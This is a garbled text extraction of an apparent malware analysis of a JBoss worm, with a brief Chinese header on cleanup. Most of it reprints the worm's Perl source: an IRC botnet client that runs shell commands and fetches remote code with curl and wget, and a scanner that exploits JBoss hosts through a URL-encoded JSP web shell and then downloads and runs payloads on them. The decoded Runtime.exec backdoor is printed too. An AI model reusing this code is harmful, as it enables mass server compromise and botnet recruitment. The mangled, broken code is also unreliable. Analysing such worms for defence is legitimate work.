Jboss漏洞導(dǎo)致linux服務(wù)器攻擊原理及解決辦法

1、Jboss 漏洞導(dǎo)致 linux 服務(wù)器攻擊原理及解決辦法原文:-details/要點(diǎn):正常清除病毒程序清除 jboss 的 server/default/deploy/mangement/ 下的idssvc.war,zecmd.war,iesvc.war.這是病毒的后門(mén)記得清除 /tmp 下的所有東西 .Youll discover that inside the encoded data there s the JSwhich is used for activating a web based system command executor based on Java Runtime.g

2、etRuntime().exec() method. magicstick This is the worm. Once deployed, the attacker performs thesesystem commands:# perl linda.plPart of the JBoss exploit code used a Java backdoor, URL-encoded for transport(3c%25 40%20%70%61%67%) I assume to avoid easy detection by anti-virus, firewalls, IDS-IPS, e

3、tc.I explored the contents of the malicious payload left and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET, install and run a remote access tool using dyndns (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Service

4、s (wstools.bat) and a script to discover all UDP-based members running on a certain mcast addressJGroups called “ JGroupsCluster Discovery Script for Win32 (probe.bat). Also included is perl script (Linda.pl) that helps in invoking the JMX console.Perl and BAT script details below: - Flu.pl -(Connec

5、ts to IRC to join a BOTNET and uses dyndns-)#!/usr/bin/perl# use IO:Socket:INET;#my $processo =“ /usr/local/apache/bin/h-tDtpSdSL”my $pid=fork;exit if $pid;$0=” $processo ”. ” “x16;# Server Config#my sopsbnet.doesntexi=( “ localhost ”, ” magicstick- ”, ” );my $port=2020*4;my $chan= ” #jb ”;my

6、 $boxing = uname -a;$user = whoami;$boxing = s/r/g;$boxing = s/n/g;$boxing = s/ /g;$boxing = s/s/g;$user = s/r/g;$user = s/n/g;$user = s/ /g;$user = s/s/g;# # Config # while(1) my $nick= ” (rand(99999).“;retry:close($sk);my $server =“”;while(length($server)<10) $server = $sopsint(rand(9);s

7、leep(3); my $sk = IO:Socket:INET->new(PeerAddr=>$server,PeerPort=&g t;$port,Proto=> ”tcp ”) or goto retry; $sk->autoflush(1);print $sk“POST /index.php HTTPr/1n.H1ost:$server:$portrnUser-Agent: Mozilla/5.0rnContent-Length: n”;print $sk“NICK $nicnk”;print $sk“USER “ .$user. : ”“ .8$u*ser.n

8、”;while($line = <$sk>)$line = s/rn$/;if ($line= QPING :(.*)/)print $sk “PONG :n$”1 ;if($line = /welcomesto/i) sleep(2);print $sk “JOIN $chna”n ;sleep(1);print $sk “PRIVMSG $chan :UserName=$boxing”;# Commands# # !dieif ($line= /PRIVMSG (.*) :.die/)$owner=$line;if($owner=/iseee/gi) sendsk($sk,“Q

9、UIT”);die;# end of !die # !rshs”(.*) ” /) $owner=$line;$de=$2; if($owner=/iseee/gi) shell=$de;foreach $line (shell) sendsk($sk,“ PRIVMSG iseee :$line”);sleep(1);# end of !rsh# !get“url” “ times ”s”(.*) s”(.*) ”/)$owner=$line;$url=$2; $mult=$3;if($owner=/iseee/gi) $url=/http:/(.*)/(.*)/g;for($xz=0;$x

10、z<=$mult;$xz+) system( “ curl“ .$url.” >/dev/null&”);curl“$url ” >/dev/null&system( “ wget“ .$url.” >/dev/null&” );wget“ $url ” >/dev/null&system( “ wget $url>/dev/null&” );sendsk($sk, “ PRIVMSG iseee :Got $host/$pa$thmult n” );# End of !get# !post “ url ”“ data

11、 ”s” (.*) s” (.*) ” /)$owner=$line;$url=$2;$ddata=$3;if($owner=/iseee/gi) $url=/http:/(.*)/(.*)/g;$host=$1;$path=$2;my $sck=new IO:Socket:INET(PeerAddr=>$host,PeerPort=>80);print $sck “ POST /$path HTTP/1.0 n”.a”“n”.a”“n”.“ Content- Length: “.length($ddata).”n”.$ddata;sleep(1);close($sck);send

12、sk($sk, “PRIVMSG (.*)sted $host/$path - n” );# End of !post# End of Commands # #sub sendsk() if ($#_ = T ) my $sk = $_0; print $sk “$_1n ” ; else print $skn“”$_; 0WStools.batecho offrem $Id: wstools.bat 499 2006-06-21 22:33:41Z $if not “ %ECHO”% = “ec”ho %ECHO%if “ %OS%” = “ Windows_NTs”etlocalset D

13、IRNAME=.if “ %OS%” = “ Windows_NT ” set DIRNAME=%dp0% set PROGNAME=run.batif “ %OS%” = “ Windows_NT ” set PROGNAME=%nx0% rem Read all command line argumentsREMREM The %ARGS% env variable commented out in favor of using %* to includeREM all args in java command line. See bug #840239. jplREMREM set AR

14、GS=REM :loopREM if %1 = goto endloopREMset ARGS=%ARGS% %1REMshiftREMgoto loopREM :endloop set JAVA=%JA VA_HOME%binjavaset JBOSS_HOME=%DIRNAME%. rem Setup the java endorsed dirs setJBOSS_ENDORSED_DIRS=%JBOSS_HOME%libendorsed rem Setup the wstools classpathsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB

15、OSS_HOME%/client/jboss-xml-binding.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/activation.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/javassist.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/jbossall-client.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_

16、CLASSPATH%;%JB OSS_HOME%/client/jbossretro-rt.jar set WSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/jboss-backport-concurrent.jar setWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/jbossws-client.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/jbossws14-clien

17、t.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/log4j.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JB OSS_HOME%/client/mail.jar rem Display our environmentecho echo WSTools Environmentecho .echo JBOSS_HOME: %JBOSS_HOME% echo .echo JAVA: %JA VA% echo .echo JAVA_OPTS: %JA VA_OPTS% e

18、cho .rem echo CLASSPATH: %WSTOOLS_CLASSPATH% rem echo .echoecho .rem Execute the JVM“%JAVA%” %JAV A_OPTS%”%JBOSS_ENDORSED_DIR”S%-Dlog4j.configuration=wstools-log4j.xml -classpath“ %WSTOOLS_CLASSPAT”%* Probe.bat echo offrem rem JGroups Cluster Discovery Script for Win32remREM Discovers all UDP-based

19、members running on a certain mcast address (use -help for help)REM Probe -help -addr <addr> -port <port>-ttl <ttl> -timeout <timeout>setCLASSPATH=.libcommons-logging.jar;.serveralllibjgroup s.jarset CP=%CLASSPATH%* Linda.pl #!/usr/bin/perl# Short and uneffic iant poc # If you

20、 see this, well, good for you.# It prolly means this test went out of control, Sorry! :use IO:Socket;my $processo =“ /usr/local/jboss/bin/tomcat”my $pid=fork;exit if $pid;$0=”$processo ” . ” “ x16;make Inx;system( “make lnx ”);system( “ perl flu.pl&” );$zecmd = “ %6d%28%69%6e%29%3b%20%53%74%72%6

21、9%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%2

22、0%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c% 2f%48%54%4d%4c%3e&argType=boolean&arg4=Trn”while(1) $partx=int(rand(255);$party=int(rand(255);$sudoku= ” ./pnscan ”HEAD / HTTP/1.0-t 6650 80 >”; system($sudoku);or dieopen FILE, “ = <FILE> close(FILE);foreach $possible (target) $possib

23、le=s/)/;$possible=s/(/;$possible=/(.*).(.*).(.*).(.*)ss(.*):s(.*)80s/g;$it= ” $1.$2.$3.$4 ” ;$it=s/s/g;$it=s/ /g;$it=s/t/g;my $crap = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto np; print $crap $zecmd;$page = “”;$page .= $_ while <$crap>sleep(2);if($page=/200

24、/|$page=/500/) print “+n“ ; push(target,$it); np:close($crap);foreach $it (target) my $sck = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;n”;$page =a ”?$page .=$_ while <$sck>print $sckGET /zecmd/zecmd.jsp HTTPr/1n.C0onnection:if($page=/comments/g) my $sck

25、a = new IO:Socket:INET(PeerAddr=>$it,PeerPort=>80, TimeOut=>120) or goto nta; print $scka “ GET /zecmd/zecmd.jsp?comment=wget+n”sleep(4);close($scka);my $sckb = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta; print $sckb“ GETn”;sleep(3);close($sckb);my $s

26、ckd = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;print $sckd “GET /zecmd/zecmd.jsp?comment=perl+linda.pl sleep(2);close($sck);nta:close($sck); Exploit PayloadExploit Payload with JA VA/JSP backdoor, URL-encoded fortransport:“%73%74%2e%67%65%74%50%61%72%61%6d%6

27、5%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%7

28、0%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%7

29、0%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=Truen”Back Door Analysis:<% page import= ” ” %><% %><HTML&g

30、t;<BODY><FORM METHOD= ” GET” NAME=” comments ”ACTION=” ><INPUT TYPE= ”text ” NAME=” comment ” ><INPUT TYPE= ” submit A”LUVE=” Send” ></FORM><pre><% if (request.getParameter(“ comment ” ) !=n ull) out.println( “ Command: ” + request.getParameter(“comm+ “ <BR&

31、gt; ”)c; ePsrso p=Runtime.getRuntime().exec(request.getParameter(“ comment ” );OutputStream os=p .getOutputStream(); InputStream in=p .getInputStream(); DataInputStream dis=n ewDataInputStream(in); String disr=d is.readLine(); while( disr !=n ull ) out.println(disr); disr=dis.readLine(); %></pre></BODY> </HTML>Worm DetectionWorm detectionThe worm can be de